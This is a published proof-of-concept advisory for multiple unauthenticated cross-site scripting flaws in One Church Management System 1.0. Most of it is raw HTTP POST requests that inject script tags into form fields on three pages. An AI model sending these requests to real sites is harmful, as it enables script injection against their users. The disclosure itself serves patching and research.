Share
## https://sploitus.com/exploit?id=PACKETSTORM:166464
# Exploit Title: One Church Management System 1.0 - Multiple Cross-site  
Scripting  
# Date: 17/03/2022  
# Exploit Author: Mr Empy  
# Software Link:  
https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html  
# Version: 1.0  
# Tested on: Linux  
  
Title:  
================  
One Church Management System 1.0 - Multiple Cross-site Scripting  
  
  
Summary:  
================  
The One Church Management System is affected by several applications with  
the vulnerability of Cross-site Scripting due to the lack of hygiene in  
certain parameters. The attacker can take advantage of this flaw to inject  
arbitrary javascript code to manipulate the victim's browser capabilities.  
  
  
Severity Level:  
================  
6.5 (Medium)  
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N  
  
  
Affected Product:  
================  
One Church Management System v1.0  
  
  
Steps to Reproduce:  
================  
  
* churchprofile.php XSS (unauthenticated) PoC:  
  
POST /one_church/churchprofile.php HTTP/1.1  
Host: target.com  
Content-Length: 187  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://target.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,  
image/avif,image/webp,image/apng,*/*;q=0.8,application/  
signed-exchange;v=b3;q=0.9  
Referer: http://target.com/one_church/churchprofile.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
companyname=<XSS HERE>&regno=<XSS HERE>&companyaddress=<XSS  
HERE>&companyemail=<XSS HERE>&country=India&mobilenumber=%2B919423979339&  
submit=  
  
======================================================================  
  
* store.php XSS (unauthenticated) PoC:  
  
POST /one_church/store.php HTTP/1.1  
Host: target.com  
Content-Length: 380  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://target.com  
Content-Type: multipart/form-data; boundary=----  
WebKitFormBoundaryV1aumPNc5OAr8WJV  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,  
image/avif,image/webp,image/apng,*/*;q=0.8,application/  
signed-exchange;v=b3;q=0.9  
Referer: http://target.com/one_church/store.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
------WebKitFormBoundaryV1aumPNc5OAr8WJV  
Content-Disposition: form-data; name="itemname"  
  
"><script>alert("XSS")</script>  
------WebKitFormBoundaryV1aumPNc5OAr8WJV  
Content-Disposition: form-data; name="descrip"  
  
"><script>alert("XSS")</script>  
------WebKitFormBoundaryV1aumPNc5OAr8WJV  
Content-Disposition: form-data; name="insert"  
  
  
------WebKitFormBoundaryV1aumPNc5OAr8WJV--  
  
======================================================================  
  
* manage_expense.php XSS (unauthenticated) PoC:  
  
POST /one_church/manage_expense.php HTTP/1.1  
Host: target.com  
Content-Length: 402  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://target.com  
Content-Type: multipart/form-data; boundary=----  
WebKitFormBoundary2XF7C8775FV2TQ4y  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,  
image/avif,image/webp,image/apng,*/*;q=0.8,application/  
signed-exchange;v=b3;q=0.9  
Referer: http://target.com/one_church/manage_expense.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
------WebKitFormBoundary2XF7C8775FV2TQ4y  
Content-Disposition: form-data; name="expense_category"  
  
"><script>alert("XSS")</script>  
------WebKitFormBoundary2XF7C8775FV2TQ4y  
Content-Disposition: form-data; name="detail"  
  
"><script>alert("XSS")</script>  
------WebKitFormBoundary2XF7C8775FV2TQ4y  
Content-Disposition: form-data; name="submitexpense"  
  
  
------WebKitFormBoundary2XF7C8775FV2TQ4y--  
  
======================================================================